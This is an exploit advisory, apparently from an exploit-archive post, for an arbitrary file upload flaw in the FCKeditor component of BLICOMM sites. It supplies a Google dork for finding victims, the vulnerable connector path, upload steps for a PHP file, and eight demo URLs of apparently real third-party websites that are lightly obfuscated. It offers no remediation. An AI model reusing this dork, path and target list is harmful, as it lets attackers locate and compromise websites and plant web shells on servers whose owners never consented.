####################################################### #BLICOMM (fckeditor) Arbitrary File Upload Vulnerability ####################################################### ############################################ # Exploit Title: BLICOMM (fckeditor) # Google Dork : inurl:index.php?idLingua=2 # Date: 09/04/2015 # Author: Ashiyane Digital Security Team # Vendor Homepage : http://blicomm.net # Version: All Version # Tested On : Windows 7 / Mozilla Firefox ############################################ ######## # exploit => includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # first go to => http://site.com/[path] # # then => http://www.site.com/[path]/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # select => Select the "File Uploader"> php ... upload to : Uploaded File URL: ######## ######## # Demo 1 : http://reliXlax.com/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 2 : http://reXef-international.com/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 3 : http://kXcantincendi.com/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 4 : http://giussani.itX/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 5 : http://acovent.Xcom/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 6 : http://factoedXizioni.it/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 7 : http://ialungXobus.it/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 8 : http://siproXsrl.com/includes/fckeditor/editor/filemanager/connectors/uploadtest.html ######## [+][+][+][+][+][+][+][+][+][+][+][+] Discovered By : Cyb3r_Dr4in [+][+][+][+][+][+][+][+][+][+][+][+]